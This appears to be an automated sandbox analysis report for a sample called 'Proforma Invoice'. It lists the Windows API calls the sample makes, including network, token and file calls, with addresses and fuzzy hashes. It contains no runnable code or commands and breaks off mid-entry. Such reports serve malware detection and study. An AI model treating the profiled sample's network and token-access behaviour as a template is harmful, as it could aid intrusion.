                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                • String ID:
                                                                                                • API String ID: 521402451-0
                                                                                                • Opcode ID: 4e61c97d75b357467cf8fbfc34dad11c1c47539a584068961113e67dce0e76a5
                                                                                                • Instruction ID: 53eb1a4199768f98a04d5b16fbaceee435e491f44860d6c680d309a3d74908f9
                                                                                                • Opcode Fuzzy Hash: 4e61c97d75b357467cf8fbfc34dad11c1c47539a584068961113e67dce0e76a5
                                                                                                • Instruction Fuzzy Hash: 9F112771604208AFDB44F7F49C86EFEB7AADF42320F60015DF20656283EE644C4657E9
                                                                                                APIs
                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007117A3
                                                                                                  • Part of subcall function 0071182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0071184C
                                                                                                  • Part of subcall function 0071182D: InternetCloseHandle.WININET(00000000), ref: 007118E9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1463438336-0
                                                                                                • Opcode ID: 603453142ab00bf4d2df65ce8de7912cfb6e7ad42a77dafbb3d1dd4481424397
                                                                                                • Instruction ID: 0ae4c390de7f37da79be6bc53ca7b10b0d12af411c1458c384631424275a058c
                                                                                                • Opcode Fuzzy Hash: 603453142ab00bf4d2df65ce8de7912cfb6e7ad42a77dafbb3d1dd4481424397
                                                                                                • Instruction Fuzzy Hash: FD21A731200605BFDB125F68DC01FFAB7A9FF48710F508029FA119A6D1DB7998519794
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNEL32(?,0072FAC0), ref: 00703A64
                                                                                                • GetLastError.KERNEL32 ref: 00703A73
                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00703A82
                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0072FAC0), ref: 00703ADF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                • String ID:
                                                                                                • API String ID: 2267087916-0
                                                                                                • Opcode ID: 8e2f49976b1f84bdaf62a0efb6889d1f319d54716e247659b11480daee19b1f8
                                                                                                • Instruction ID: 09fb3441d9ea9cd06d31c8560b90c5ee17c27730e4aec4c2386838959ef4a219
                                                                                                • Opcode Fuzzy Hash: 8e2f49976b1f84bdaf62a0efb6889d1f319d54716e247659b11480daee19b1f8
                                                                                                • Instruction Fuzzy Hash: 402185B4608201DFC310EF28C84186A77F8AF56364F108B2EF499C72D1D7359E46CB42
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 006D5101
                                                                                                  • Part of subcall function 006C571C: __FF_MSGBANNER.LIBCMT ref: 006C5733
                                                                                                  • Part of subcall function 006C571C: __NMSG_WRITE.LIBCMT ref: 006C573A
                                                                                                  • Part of subcall function 006C571C: RtlAllocateHeap.NTDLL(01190000,00000000,00000001,00000000,?,?,?,006C0DD3,?), ref: 006C575F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 614378929-0
                                                                                                • Opcode ID: 84d837bbd6190933fb036239715103f6b23c601a184261b4becbf8514a43b5f5
                                                                                                • Instruction ID: c82d93a8096abaaeddda879ae1c7acddc2c1da65a5bfe30c4c069502725b271c
                                                                                                • Opcode Fuzzy Hash: 84d837bbd6190933fb036239715103f6b23c601a184261b4becbf8514a43b5f5
                                                                                                • Instruction Fuzzy Hash: 6811A771D04A11AFCB712F74AC45BBD37AAEF143A1B10452FF90A97751DE348D418698
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 006A44CF
                                                                                                  • Part of subcall function 006A407C: _memset.LIBCMT ref: 006A40FC
                                                                                                  • Part of subcall function 006A407C: _wcscpy.LIBCMT ref: 006A4150
                                                                                                  • Part of subcall function 006A407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006A4160
                                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 006A4524
                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006A4533
                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006DD4B9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 1378193009-0
                                                                                                • Opcode ID: b157bca8855a2ebe1c590c7b90e5839d0a6f8def373b2e3c54f1fec17d0b9f3b
                                                                                                • Instruction ID: 345469f37a55d3b5aece7b59450ceb8367c3a92419e3a8aed6446db7453ae113
                                                                                                • Opcode Fuzzy Hash: b157bca8855a2ebe1c590c7b90e5839d0a6f8def373b2e3c54f1fec17d0b9f3b
                                                                                                • Instruction Fuzzy Hash: BF21F874D04784AFE732AB248C55BE6BBEDAF02308F04009EE68A56341C7B42D85CB45
                                                                                                APIs
                                                                                                  • Part of subcall function 006A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00707896,?,?,00000000), ref: 006A5A2C
                                                                                                  • Part of subcall function 006A5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00707896,?,?,00000000,?,?), ref: 006A5A50
                                                                                                • gethostbyname.WSOCK32(?,?,?), ref: 00716399
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 007163A4
                                                                                                • _memmove.LIBCMT ref: 007163D1
                                                                                                • inet_ntoa.WSOCK32(?), ref: 007163DC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                • String ID:
                                                                                                • API String ID: 1504782959-0
                                                                                                • Opcode ID: 9e0f9b0eb8e4a15763f29f2fce2f747f4c581c1e3841dc299cdffa8a2ba5cc0e
                                                                                                • Instruction ID: e8b9a7e18e3300bb2618de9e1ec343b6111c24bcdd2ce1f7f5ff76cd7979395d
                                                                                                • Opcode Fuzzy Hash: 9e0f9b0eb8e4a15763f29f2fce2f747f4c581c1e3841dc299cdffa8a2ba5cc0e
                                                                                                • Instruction Fuzzy Hash: 79116031500109AFCB44FBA4DD46DEFB7B9EF09310B144079F506A71A1DB34AE05DB65
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 006F8B61
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006F8B73
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006F8B89
                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006F8BA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 8d8db076e8ad8f4cc4f82b14c6589e9f0645e056197df38474bae34c5e2668ab
                                                                                                • Instruction ID: 47b09d1a361ce3545f21090a6b4dc11bc8350040365e14c791ac6f924da93002
                                                                                                • Opcode Fuzzy Hash: 8d8db076e8ad8f4cc4f82b14c6589e9f0645e056197df38474bae34c5e2668ab
                                                                                                • Instruction Fuzzy Hash: 2B111879901218FFEB11DFA5CC85FADBBB9FB48710F2040A5EA00B7290DA716E11DB94
                                                                                                APIs
                                                                                                  • Part of subcall function 006A2612: GetWindowLongW.USER32(?,000000EB), ref: 006A2623
                                                                                                • DefDlgProcW.USER32(?,00000020,?), ref: 006A12D8
                                                                                                • GetClientRect.USER32(?,?), ref: 006DB5FB
                                                                                                • GetCursorPos.USER32(?), ref: 006DB605
                                                                                                • ScreenToClient.USER32(?,?), ref: 006DB610
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                • String ID:
                                                                                                • API String ID: 4127811313-0
                                                                                                • Opcode ID: ce942f2b8fcfe340cdc1c6ebc715b696116683ee50df6fe8ccfe2db207c67fea
                                                                                                • Instruction ID: 4b6bb890a70618a09b7f738eef4cb885c4dd2bb9eacf8e3e3c6eadcb12ad376a
                                                                                                • Opcode Fuzzy Hash: ce942f2b8fcfe340cdc1c6ebc715b696116683ee50df6fe8ccfe2db207c67fea
                                                                                                • Instruction Fuzzy Hash: 23113D35500019EFCB10EFA8D985AEE77B9EB06300F404465F901E7240C734FE929FA9
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006FD84D
                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006FD864
                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006FD879
                                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 006FD897
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                • String ID:
                                                                                                • API String ID: 1352324309-0
                                                                                                • Opcode ID: d247d657bf3c283c652524de7e3c1f58ac8a8bc1d5ad998da16c263e8d584f52
                                                                                                • Instruction ID: 58322532c1975dfd7cb8a2dbdb11cde2ff83b82b8b95103e1d62a8d4c570c620
                                                                                                • Opcode Fuzzy Hash: d247d657bf3c283c652524de7e3c1f58ac8a8bc1d5ad998da16c263e8d584f52
                                                                                                • Instruction Fuzzy Hash: BF115EB5605308EBE3209F50DC08FA6BBBEEB00B40F10856DE626D6190D7B4F54A9BA1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                • String ID:
                                                                                                • API String ID: 3016257755-0
                                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                • Instruction ID: cead23885576dd375eb2a5af25edfd9b08b8102cd9eef56332415551ee1dd2c2
                                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                • Instruction Fuzzy Hash: F001407284414ABBCF265F84DC01CED3F63BB18355F588456FE1859271E236C9B1AB82
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 0072B2E4
                                                                                                • ScreenToClient.USER32(?,?), ref: 0072B2FC
                                                                                                • ScreenToClient.USER32(?,?), ref: 0072B320
                                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0072B33B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                • String ID:
                                                                                                • API String ID: 357397906-0
                                                                                                • Opcode ID: b9c636ea4f905a3a3cb14215906c53dc63c33c6d00162366e009a5ab78ca9a2b
                                                                                                • Instruction ID: 8cdc1a71d452e9d7349b20b9d098af5c9fc3df2a075224e094adf5e6ae0cde80
                                                                                                • Opcode Fuzzy Hash: b9c636ea4f905a3a3cb14215906c53dc63c33c6d00162366e009a5ab78ca9a2b
                                                                                                • Instruction Fuzzy Hash: EE1144B9D00209EFDB51CFA9D8849EEBBF9FF08310F108166E914E3620D735AA558F54
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00706BE6
                                                                                                  • Part of subcall function 007076C4: _memset.LIBCMT ref: 007076F9
                                                                                                • _memmove.LIBCMT ref: 00706C09
                                                                                                • _memset.LIBCMT ref: 00706C16
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00706C26
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 48991266-0
                                                                                                • Opcode ID: 55b331ab129572c099283ac72c3376a58894e2431280e786caf7f4a778ce939e
                                                                                                • Instruction ID: bb6bf907214922c41c5c7b977993b5c298dc97e8ffd1b9b9339e2b8709e383c8
                                                                                                • Opcode Fuzzy Hash: 55b331ab129572c099283ac72c3376a58894e2431280e786caf7f4a778ce939e
                                                                                                • Instruction Fuzzy Hash: 9EF0303A100100EBCF416F95DC85E5ABB6AEF45320B04C069FE095E266CB35A811CBB8
                                                                                                APIs
                                                                                                • GetSysColor.USER32(00000008), ref: 006A2231
                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 006A223B
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 006A2250
                                                                                                • GetStockObject.GDI32(00000005), ref: 006A2258
                                                                                                • GetWindowDC.USER32(?,00000000), ref: 006DBE83
                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 006DBE90
                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 006DBEA9
                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 006DBEC2
                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 006DBEE2
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 006DBEED
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1946975507-0
                                                                                                • Opcode ID: e30e5d589b873e8b24904d4978a201d1eaec58451d935bfabc32cdb63e70f611
                                                                                                • Instruction ID: 35868b511b2501dd97c004c0f0e9e0cb03749b6daed6a8e68664b3ec0fc31155
                                                                                                • Opcode Fuzzy Hash: e30e5d589b873e8b24904d4978a201d1eaec58451d935bfabc32cdb63e70f611
                                                                                                • Instruction Fuzzy Hash: D7E03932504248EBDB215F68EC0DBD83B21EB05332F00C376FA69881E5C77549A1DB12
                                                                                                APIs
                                                                                                • GetCurrentThread.KERNEL32 ref: 006F871B
                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,006F82E6), ref: 006F8722
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006F82E6), ref: 006F872F
                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,006F82E6), ref: 006F8736
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                • String ID:
                                                                                                • API String ID: 3974789173-0
                                                                                                • Opcode ID: 2e7c4885c10901bcb6db90d955f2f71e93048f81a2789aeb96996889d3565404
                                                                                                • Instruction ID: 6b33542750ad35e9c9d71710dbd50c53b0d03213d86abe01dbbc9f2d954ac040
                                                                                                • Opcode Fuzzy Hash: 2e7c4885c10901bcb6db90d955f2f71e93048f81a2789aeb96996889d3565404
                                                                                                • Instruction Fuzzy Hash: DFE04F36611211DBD7306FB05E0CB9A3BB8EF55791F148878E245CA040DA3884428754
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %s
                                                                                                • API String ID: 0-3318637821
                                                                                                • Opcode ID: 2634ef423ff5ac113de39fc687450ccb3d366873fe38bccd029b3e141ef72848
                                                                                                • Instruction ID: 2728dc7ad5de4f8b90dab6192ea121f58450b00b0b516b862ca18ee1dea1b94f
                                                                                                • Opcode Fuzzy Hash: 2634ef423ff5ac113de39fc687450ccb3d366873fe38bccd029b3e141ef72848
                                                                                                • Instruction Fuzzy Hash: 94B18E718001099ACF14FF94C8859FEB7B7EF5A310F18806AF912A7291DB349E82CF95
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __itow_s
                                                                                                • String ID: xbv$xbv
                                                                                                • API String ID: 3653519197-3931776673
                                                                                                • Opcode ID: 960a26f5dca1422f4ec3613d831bbb87cbcc1ef6de37d723a42176e7538161d2
                                                                                                • Instruction ID: a60b427decff7252dc48c38d6cdb177df4474eb0c941c4cdc00dc5f49679aca1
                                                                                                • Opcode Fuzzy Hash: 960a26f5dca1422f4ec3613d831bbb87cbcc1ef6de37d723a42176e7538161d2
                                                                                                • Instruction Fuzzy Hash: F2B17F70A00209EFCB14EF58C891DEABBBAFF49310F148059F9459B291EB74ED85DB64
                                                                                                APIs
                                                                                                  • Part of subcall function 006BFC86: _wcscpy.LIBCMT ref: 006BFCA9
                                                                                                  • Part of subcall function 006A9837: __itow.LIBCMT ref: 006A9862
                                                                                                  • Part of subcall function 006A9837: __swprintf.LIBCMT ref: 006A98AC
                                                                                                • __wcsnicmp.LIBCMT ref: 0070B02D
                                                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0070B0F6
                                                                                                Strings
                                                                                                Memory Dump Source
